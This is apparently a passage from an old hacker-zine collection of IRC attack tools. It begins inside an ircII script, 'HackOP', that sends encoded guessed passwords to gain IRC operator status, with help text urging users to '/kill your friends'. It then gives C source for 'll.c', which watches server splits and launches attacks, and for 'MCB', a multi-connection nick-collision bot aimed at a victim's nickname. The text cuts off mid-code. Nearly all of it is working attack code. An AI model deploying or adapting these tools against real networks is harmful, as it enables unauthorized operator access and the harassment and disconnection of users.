[FOGPGOCACDFOHCGBHHFPGJHCGDCADACACCCFCADEDADBCACFCACFCADKEOGPCKCCCAHLGJGGCACIFLCEDDFNCBDNFLCEGCGPGGGIFNCJCAHLGFGDGIGPCACKCKCKCACEHDHEHCGJHACIDKCACEDDCNCJHNHLEACAGCGPGGGICADNCAFLDNDAFNHNHN] @ HackOP.M = [GFHGGBGMCACPCPFOGOGPHEGJGDGFCACEGCGPGGGICAFCHFGOGOGJGOGHCAEIGBGDGLEPFACACNCACEHEGJGNGFCICJ] @ HackOP.N = [FOGBGMGJGBHDCAHDHBHFGJHECAHLCPCPFOHDGJGHGOGPGGGGCACPHDHBHFGJHECACEDACNHN] @ HackOP.O = [FOGBGMGJGBHDCAGDGPGOGOGFGDHECAGJGGCACIFLCEDAFNCJCAHLHNHLHNDLGFGDGIGPCACKCKCKCAEDEPEOEOEFEDFECAEOGPHECAGFGOGPHFGHGICAHAGBHCGBGNGFHEGFHCHD] @ HackOP.P = [FOHDGFHECAGFHIGFGDFPHAHCGPHEGFGDHEGJGPGOCAGPGGGG] @ HackOP.Q = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEJHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD] @ HackOP.R = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEKHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD] @ HackOP.S = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAEACAGCGPGGGICADNCAFLCEGCGPGGGIFNCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD] @ HackOP.Z = [FOGBGMGJGBHDCACNHBHFGPHEGF] # # ### Ignore failed hack attempts.. # # on #^raw_irc "% 491 *No O-lines*" # # # ### Poke server (causes a "POKE : unknown command" reply) # # @ hackop.poke.junk = [FOGBGMGJGBHDCAHBHFGPHEGFCAHLCEGEGFGDGPGEGFCICEDCCNCJHN] alias hackop.poke { quote POKE \\;$decode($hackop.poke.junk) wait } # # ### Send bogus passwords.. # # alias hackop.hack { foreach HackOP XX { if ([$(HackOP.$XX)]!=[]) {quote OPER $N $(HackOP.$XX)} wait } } # # ### Attempt to hack ops.. # # alias hackop { umode -sw echo [HackOP] Poking server.. (should reply with error message) hackop.poke echo [HackOP] Attempting to hack IrcOps.. hackop.hack } # # ### Help.. # # alias hackhelp { echo echo [HackOP] You have loaded HackOP.irc v1.3+path from Illegible 8. echo [HackOP] echo [HackOP] This script attempts to hack IRC Operator status on echo [HackOP] your current server. To use it just type /hackop. echo [HackOP] echo [HackOP] Aliases added: /hackhelp /hackop /kpath echo [HackOP] echo [HackOP] Enjoy it.. /kill your friends. 8-) echo } # # ### The following code is taken from the ircII 2.2.9 distribution... # # ############################################################################### # # No Kill Path Script II # # converted to 2.2.1 by phone # CONVERTED for ircII2.2 # Version for servers 2.7.1* by Nap@irc <pioch@poly.polytechnique.fr> # Original script from YeggMan # Simplification by Daemon # This version works both with old and new 2.7.1e kill formats ! @ kpath.kpath = [<empty>] alias kpath echo ### Last received KILL Path: $kpath.kpath alias kpath.ridx @ function_return = RINDEX(! $0) + 1 alias kpath.is_serv @ function_return = INDEX(. $MID($kpath.ridx($0) 512 $0)) alias kpath.opkill echo ### KILL for $0 $MID($kpath.ridx($1) 9 $1) $2- alias kpath.svkill echo ### ServerKill for $0 on ^server_notice "% * Notice -- Received KILL*" { if ([$9] == [From]) { ^assign kpath.kpath $12- if (kpath.is_serv($12) > -1) { kpath.svkill $8 } { kpath.opkill $8 $10 $13- } } { ^assign kpath.kpath $10- if (kpath.is_serv($10) > -1) { kpath.svkill $8 } { kpath.opkill $8 $10 $11- } } } ###[End of stolen code]######################################################## # # ### HackOP loaded message, misc stuff. # # alias umode mode $N $0- echo [HackOP] HackOP.irc v1.3+path loaded. Type /hackhelp for help ------------------------------------------------------------------------------ [Editor's Note: This is used in conjunction with the next program] /*=============================================================*\ * ll.c - link looker * * Copyright (C) 1994 by The Software System * * Written by George Shearer (george@sphinx.biosci.wayne.edu) * \*=============================================================*/ /* This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ #define BUFSIZE 400 /* IRC Server buffer */ #define SERVER "irc.escape.com" /* IRC Server */ #define PORT 6667 /* IRC Port */ #define DELAYS 30 /* Loop delay seconds*/ #define TIMEOUT 30 /* connection timeout*/ #define ESTABLISHED 1 #define INPROGRESS 2 #define SPLIT 1 unsigned short int session=0,link_count=0; char in[BUFSIZE],out_buf[BUFSIZE],hostname[64]; char *ins=in; char *dedprsn, *kradprsn; #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/time.h> #include <fcntl.h> #include <signal.h> #include <errno.h> #include <netinet/in.h> #include <sys/socket.h> #include <netdb.h> #include <arpa/inet.h> struct irc_server { char *name; char *link; unsigned short int status; struct irc_server *next; } *sl1=(struct irc_server *)0,*sl2=(struct irc_server *)0; void do_ping(char *,char *); void do_001(char *,char *); void do_error(char *,char *); void do_364(char *,char *); void do_365(char *,char *); struct parsers { char *cmd; void (*func)(char *,char *); } parsefuns[] = { { "PING", (void *)do_ping }, { "001", (void *)do_001 }, { "364",(void *)do_364 }, { "365", (void *)do_365}, { "ERROR",(void *)do_error}, { (char *)0,(void *)0 } }; struct sockaddr_in server; int sock=0; unsigned long int resolver(char *host) { unsigned long int ip=0L; if(host && *host && (ip=inet_addr(host))==-1) { struct hostent *he; int x=0; while(!(he=gethostbyname((char *)host)) && x++<3) { printf("."); fflush(stdout); sleep(1); } ip=(x<3) ? *(unsigned long *)he->h_addr_list[0] : 0L; } return(ip); } void clean_sl2(void) { while(sl2) { struct irc_server *temp=sl2->next; if(sl2->name) free(sl2->name); if(sl2->link) free(sl2->link); free(sl2); sl2=temp; } sl2=(struct irc_server *)0; } void exit_program(char *why) { printf("\nExiting program. (%s)\n",why); if(sock) close(sock); while(sl1) { struct irc_server *temp=sl1->next; if(sl1->name) free(sl1->name); if(sl1->link) free(sl1->link); free(sl1); sl1=temp; } clean_sl2(); if(in) free(in); exit(0); } int mystrccmp(register char *s1,register char *s2) { while((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)== (((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++)) if(*s1++==0) return 0; return (*(unsigned char *)s1-*(unsigned char *)--s2); } char *mstrcpy(char **to,char *from) { if(from) { if((*to=(char *)malloc(strlen(from)+1))) strcpy(*to,from); } else *to=(char *)0; return(*to); } char *digtoken(char **string,char *match) { if(string && *string && **string) { while(**string && strchr(match,**string)) (*string)++; if(**string) { /* got something */ char *token=*string; if((*string=strpbrk(*string,match))) { *(*string)++=(char)0; while(**string && strchr(match,**string)) (*string)++; } else *string = ""; /* must be at the end */ return(token); } } return((char *)0); } void signal_handler(void) { exit_program("caught signal"); } void signal_alarm(void) { exit_program("timed out waiting for server interaction."); } void out(void) { int length=strlen(out_buf); errno=0; if(write(sock,out_buf,length)!=length) exit_program((char *)errno); } void init_server(void) { int length; sprintf(out_buf,"USER kil kil kil :ded kilr huntin %s\nNICK kil%d\nPRIVMSG %s :ded kilr hunting %s\n", dedprsn, getpid(), kradprsn, dedprsn); length=strlen(out_buf); errno=0; if(write(sock,out_buf,length)==length) { puts("established"); session=ESTABLISHED; alarm(TIMEOUT); sprintf(out_buf,"LINKS\n"); out(); } else exit_program((char *)errno); } void heartbeat(void) { strcpy(out_buf,"LINKS\n"); out(); signal(SIGALRM,(void *)heartbeat); alarm(DELAYS); } void do_364(char *from,char *left) { struct irc_server *serv; char *sv1,*sv2; char *nick; serv=(struct irc_server *)malloc(sizeof(struct irc_server)); serv->next=sl2; serv->status=0; nick=digtoken(&left," "); sv1=digtoken(&left," "); sv2=digtoken(&left," "); mstrcpy(&serv->name,sv1); mstrcpy(&serv->link,sv2); sl2=serv; } int findserv(struct irc_server *serv,char *name) { for(;serv;serv=serv->next) if(!mystrccmp(name,serv->name)) return(1); return(0); } void do_365(char *from,char *left) { struct irc_server *serv=sl1; char kilstring[150]; for(;serv;serv=serv->next) { if(!findserv(sl2,serv->name)) { if(!(serv->status & SPLIT)) { printf("Split server : %s [%s]\n",serv->name,serv->link); serv->status|=SPLIT; } } else if(serv->status & SPLIT) { printf("Merging server: %s [%s]\n",serv->name,serv->link); sprintf(kilstring, "mcb %s %s:%s %s&", kradprsn, dedprsn, serv->name, serv->link); system(kilstring); serv->status&=~SPLIT; } } serv=sl2; for(;serv;serv=serv->next) { if(!findserv(sl1,serv->name)) { struct irc_server *serv2; serv2=(struct irc_server *)malloc(sizeof(struct irc_server)); serv2->next=sl1; serv2->status=0; mstrcpy(&serv2->name,serv->name); mstrcpy(&serv2->link,serv->link); sl1=serv2; if(link_count) { printf("Added server : %s [%s]\n",serv->name,serv->link); sprintf(kilstring, "mcb %s %s:%s %s&", kradprsn, dedprsn, serv->name, serv->link); system(kilstring); } } } link_count=1; clean_sl2(); } void do_ping(char *from,char *left) { sprintf(out_buf,"PING :%s\n",hostname); out(); } void do_001(char *from,char *left) { printf("Logged into server %s as nickname kil%d\n",from,getpid()); printf("Hunting %s\n\n", dedprsn); alarm(0); signal(SIGALRM,(void *)heartbeat); alarm(DELAYS); } void do_error(char *from,char *left) { printf("Server error: %s\n",left); } void parse2(void) { char *from,*cmd,*left; if(*ins==':') { if(!(cmd=strchr(ins,' '))) return; *cmd++=(char)0; from=ins+1; } else { cmd=ins; from=(char *)0; } if((left=strchr(cmd,' '))) { int command; *left++=(char)0; left=(*left==':') ? left+1 : left; for(command=0;parsefuns[command].cmd;command++) { if(!mystrccmp(parsefuns[command].cmd,cmd)) { parsefuns[command].func(from,left); break; } } } } void parse(int length) { char *s=in; *(ins+length)=(char)0; for(;;) { ins=s; while(*s && *s!=(char)13 && *s!=(char)10) s++; if(*s) { while(*s && (*s==(char)13 || *s==(char)10)) *s++=(char)0; parse2(); } else break; } strcpy(in,ins); ins=in+(s-ins); } void process_server(void) { int x=0; for(;;) { fd_set rd,wr; struct timeval timeout; timeout.tv_usec=0; timeout.tv_sec=1; FD_ZERO(&rd); FD_ZERO(&wr); FD_SET(sock,&rd); if(session==INPROGRESS) FD_SET(sock,&wr); errno=0; select(getdtablesize(),&rd,&wr,NULL,(session==INPROGRESS) ? (struct timeval *)&timeout : NULL); if(errno==EINTR) continue; errno=0; if(session==INPROGRESS) { if(FD_ISSET(sock,&wr)) { init_server(); continue; } else { if(x++>=TIMEOUT) exit_program("connection timed out"); printf("."); fflush(stdout); } } if(FD_ISSET(sock,&rd)) { int length=read(sock,ins,BUFSIZE-(ins-in)); if(length<1) { if(session!=INPROGRESS) if(!errno) { puts("Connection closed by foreign host."); errno=ENOTCONN; } else printf("Connection to %s closed.\n", inet_ntoa(server.sin_addr)); exit_program((char *)errno); } if(strpbrk(in,"\x0a\x0d")) parse(length); else ins=(BUFSIZE-((ins+length)-in)<1)?in:ins+length; } } } void main(int argc,char *argv[]) { char serverhost[80]; unsigned short int sport=PORT; kradprsn = argv[1]; dedprsn = argv[2]; if(argc<3) exit(1); if(argc==4) { char *port=strchr(argv[3],':'); sport=(port)?atoi(port+1):sport; strcpy(serverhost,argv[3]); if(port) serverhost[port-argv[3]]=(char)0; } else strcpy(serverhost,SERVER); signal(SIGPIPE,(void *)signal_handler); signal(SIGHUP,(void *)signal_handler); signal(SIGINT,(void *)signal_handler); signal(SIGTERM,(void *)signal_handler); signal(SIGBUS,(void *)signal_handler); signal(SIGABRT,(void *)signal_handler); signal(SIGSEGV,(void *)signal_handler); signal(SIGALRM,(void *)signal_alarm); errno=0; if((sock=socket(AF_INET,SOCK_STREAM,0))>0) { server.sin_family=AF_INET; server.sin_port=htons(sport); printf("Resolving %s...",serverhost); fflush(stdout); if((server.sin_addr.s_addr=resolver(serverhost))) { puts("done"); setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0); setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0); setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0); fcntl(sock,F_SETFL,(fcntl(sock,F_GETFL)|O_NONBLOCK)); printf("Connecting to %s...",inet_ntoa(server.sin_addr)); fflush(stdout); errno=0; if(connect(sock,(struct sockaddr *)&server,sizeof(server))) { if(errno!=EINPROGRESS && errno!=EWOULDBLOCK) exit_program((char *)errno); else session=INPROGRESS; } else init_server(); gethostname(hostname,64); process_server(); } else exit_program("resolve failed"); } else printf("Failed to allocate an AF_INET socket. (%s)\n",(char *)errno); } ------------------------------------------------------------------------------ /*===============================*\ |* MCB - Multi-CollideBot v1.5a *| |* Written by Dr. Delete *| |* Basically just a way to make *| |* several TCP connections to a *| |* server in one small process. *| \*===============================*/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <fcntl.h> #include <signal.h> #include <errno.h> #include <sys/socket.h> #include <sys/time.h> #include <sys/wait.h> #include <netinet/in.h> #include <netdb.h> #include <fcntl.h> #include <sys/file.h> #include <arpa/inet.h> #define BUFSIZE 350 #define MAXSESSIONS 256 #define BOTTIMEOUT 900 /* 15 minutes (900 seconds) bot lifetime */ struct sockaddr_in server; char buf[BUFSIZE]; char *kradprsn; struct ircsession { int sock; char stack[BUFSIZE*2]; char *server; char *nick; int stat; } session[MAXSESSIONS]; int sessions,total_sessions; char *nickpick="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`_"; #define NICKLEN 54 void sig_pipe(void) { puts("Odd, I just caught a SIGPIPE."); signal(SIGPIPE,(void *)sig_pipe); } void fillran(char *s,int len) { while(len--) *s++=*((nickpick)+(rand()%NICKLEN)); *s=0; } int strnccmp(register char *s1,register char *s2,register int n) { if(n==0) return(0); do { if((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)!=(((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++)) return (*(unsigned char *)s1-*(unsigned char *)--s2); if(*s1++==0) break; } while(--n!=0); return(0); } char *mycstrstr(char *str1,char *str2) { int xstr1len,ystr2len; xstr1len=strlen(str1); ystr2len=strlen(str2); while(xstr1len && strnccmp(str1++,str2,ystr2len) && xstr1len-->=ystr2len); if(!xstr1len || xstr1len<ystr2len || !ystr2len) return(0); return(str1-1); } void out(int fd, char *s) { write(fd,s,strlen(s)); } void cclosed(int sessionum) { if(session[sessionum].sock) shutdown(session[sessionum].sock,2); close(session[sessionum].sock); session[sessionum].sock=0; printf("%s: Connection to %s closed.\n",session[sessionum].nick,session[sessionum].server); fflush(stdout); if(!sessions || !total_sessions) { puts("CollideBot finished."); exit(0); } } void quitprog(void) { printf("Signal received! CollideBot exiting. %d sessions still active.\n",sessions); fflush(stdout); while(total_sessions--) if(session[total_sessions].sock) { out(session[total_sessions].sock,"QUIT :signal received\r\n"); cclosed(total_sessions); } puts("CollideBot finished."); exit(0); } unsigned long int resolver(char *host) { int x=0; unsigned long int tempresl; struct hostent *he; if(sscanf(host,"%d.%d.%d.%d",&x,&x,&x,&x)==4 || !strcmp(host,"0")) return(inet_addr(host)); while(!(he=gethostbyname((char *)host)) && x++<3) sleep(1); if(x<3) return(htonl((unsigned long int)((unsigned char)he->h_addr_list[0][0]* (unsigned int)256+(unsigned char)he->h_addr_list[0][1])* (unsigned int)65536+(unsigned long int)((unsigned char) he->h_addr_list[0][2]*(unsigned int)256+(unsigned char) he->h_addr_list[0][3]))); printf("Unable to resolve %s!\n",host); return(0); } void estab2(int sock,char *ircservername,char *nick) { char tempnick[10]; printf("%s: Connection to %s established.\n",nick,ircservername); fflush(stdout); fillran(tempnick,9); sprintf(buf,"USER %s %s %s %s\r\nNICK %s\r\nPRIVMSG %s :%s iz ded, woowoo\r\n",tempnick,tempnick,tempnick,tempnick,(!strnccmp(nick,kradprsn,5)) ? tempnick : nick, kradprsn, nick); fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) & ~O_NDELAY)); out(sock,buf); } int estab(unsigned long int ircserver,char *ircservername,int x) { int sock; sock=socket(AF_INET,SOCK_STREAM,0); server.sin_family=AF_INET; server.sin_port=htons(6667); server.sin_addr.s_addr=ircserver; fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) | O_NDELAY)); errno=0; if((session[x].nick[0]==68 || session[x].nick[0]==100) && (session[x].nick[1]==82 || session[x].nick[1]==114) && (session[x].nick[2]==95) && (session[x].nick[3]==68 || session[x].nick[3]==100) && (session[x].nick[4]==69 || session[x].nick[4]==101) && (session[x].nick[5]==76 || session[x].nick[5]==108) && (session[x].nick[6]==69 || session[x].nick[6]==101) && (session[x].nick[7]==84 || session[x].nick[7]==116) && (session[x].nick[8]==69 || session[x].nick[8]==101)) { printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout); close(sock); return(0); } if(connect(sock,(struct sockaddr *)&server,sizeof(server))<0) { if(errno!=EINPROGRESS) { printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout); close(sock); return(0); } else session[x].stat=2; } else { estab2(sock,ircservername,session[x].nick); session[x].stat=0; } return(sock); } void parse2(char *buf,int len,int sessionum) { char *num; if((num=mycstrstr(buf," "))) if(atoi((num+1))==372) return; if(!strnccmp(buf,"PING",4)) { buf[1]='O'; out(session[sessionum].sock,(char *)buf); out(session[sessionum].sock,"\r\n"); } else if(mycstrstr(buf,"already in use")) { printf("%s: Nickname already in use.\n",session[sessionum].nick); out(session[sessionum].sock,"QUIT\r\n"); } else if(mycstrstr(buf,"kill") && !session[sessionum].stat++) printf("%s: SCORE!\n",session[sessionum].nick); else if(mycstrstr(buf,"authoriz")) printf("%s: Not authorized to use server.\n",session[sessionum].nick); else if(mycstrstr(buf,"ghosts")) printf("%s: Banned from this IRC server.\n",session[sessionum].nick); } void parse(unsigned char *buf,int rl,int sessionum) { int x=0,len; strcat(session[sessionum].stack,buf); len=strlen(session[sessionum].stack); while(session[sessionum].stack[x]!=13 && session[sessionum].stack[x]!=10 && session[sessionum].stack[x]) x++; if(session[sessionum].stack[x]) { session[sessionum].stack[x]=0; parse2(session[sessionum].stack,x+1,sessionum); if(len>=(x+1)) { strcpy(buf,(char *)&session[sessionum].stack[x+1]); session[sessionum].stack[0]=0; parse(buf,len-(x+1),sessionum); } else session[sessionum].stack[0]=0; } } void process_servers(int secs) { fd_set rd,wr; int x,length,selectr=1; struct timeval timeout; while(selectr>0) { timeout.tv_usec=0; timeout.tv_sec=secs; errno=0; FD_ZERO(&rd); FD_ZERO(&wr); for(x=0;x<total_sessions;x++) if(session[x].sock) if(session[x].stat!=2) FD_SET(session[x].sock,&rd); else FD_SET(session[x].sock,&wr); selectr=select(getdtablesize(),&rd,&wr,NULL,(secs<0) ? NULL : (struct timeval *)&timeout); if(errno==EINTR) continue; for(x=0;x<total_sessions;x++) if(FD_ISSET(session[x].sock,&wr)) { session[x].stat=0; estab2(session[x].sock,session[x].server,session[x].nick); } else if(session[x].stat!=2 && FD_ISSET(session[x].sock,&rd)) { if(!(length=read(session[x].sock,buf,BUFSIZE-1))) { sessions--; cclosed(x); continue; } buf[length]=0; parse(buf,length,x); } } } void main(int argc,char *argv[]) { unsigned short int pid,x; unsigned long int ircserver=0; char *lastnick=0; if(argc<3) exit(0); kradprsn = argv[1]; /* if((pid=fork())) { printf("Process ID %d.\n",pid); exit(0); } */ sessions=total_sessions=0; srand(getpid()); signal(SIGHUP,(void *)quitprog); signal(SIGTERM,(void *)quitprog); signal(SIGABRT,(void *)quitprog); signal(SIGINT,(void *)quitprog); signal(SIGPIPE,(void *)sig_pipe); for(x=1;x<argc-1 && x<MAXSESSIONS;x++) { char *tempp,*default_server; unsigned long int tempserver; session[x].nick=(argv[x+1][0]=='@') ? (char *)&argv[x+1][1] : argv[x+1]; if((tempp=mycstrstr(argv[x+1],":"))) { *tempp=0; lastnick=session[x].nick; tempserver=ircserver; ircserver=resolver(tempp+1); if(ircserver) default_server=tempp+1; else ircserver=tempserver; } else if(mycstrstr(argv[x+1],".")) { if(!lastnick) { printf("Error: No default nickname to use for connection to %s!\n",argv[x+1]); continue; } tempserver=ircserver; ircserver=resolver(argv[x+1]); if(ircserver) default_server=argv[x+1]; else ircserver=tempserver; session[x].nick=lastnick; } lastnick=session[x].nick; if(ircserver) { if((session[x].sock=estab(ircserver,default_server,x))) { session[x].stack[0]=0; session[x].server=default_server; sessions++; } } else printf("%s: Error! No default server set.\n",session[x].nick); total_sessions=x+1; } if(sessions<1) { printf("CollideBot Exiting, no established sessions.\n"); exit(0); } signal(SIGALRM,(void *)quitprog); alarm(BOTTIMEOUT); while(1) ------------------------------------------------------------------------------